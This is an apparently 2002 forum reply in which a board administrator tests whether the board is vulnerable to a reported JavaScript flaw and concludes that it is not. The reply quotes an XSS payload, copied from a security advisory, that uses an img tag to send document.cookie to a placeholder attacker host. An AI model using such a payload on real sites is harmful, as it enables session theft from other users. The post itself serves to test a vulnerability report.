Magnus
Administrator
    
 Ad astra per aspera.
Posts: 4106
|
 |
Re: ADMIN PLEASE READ
« Reply #3 on: Mar 2nd, 2002, 10:29am » |
Quote Modify
|
The vulnerability has nothing to do with Java. It has something to do with JavaScript. Java is a programming language invented by Sun. JavaScript is a scripting language used in browsers. Now please pay attention: Immediately below the the code below the exploit code, as shown in the box, appears in this post. The exploit code has been copied directly from the SecurityFocus web site. Code: [img]javascript:document.write ('<img src=http://attackerssite/tools/cookie.plx?cookie='+escape(docu ment.cookie)+'>') [/img] |
| The "exploit" code has been inserted here, between the "--" separators: -- -- As you can plainly see no "broken image" graphic appears as it would have if the exploit were succesful. (The exploit attempts to send the data to the www.mischel.dhs.org site, and the file it is referring to does not exist, trust me.) I have even checked the web site logs and no record of any kind exists of the exploit transmitting any data, as there would have been, had the board been vulnerable.
|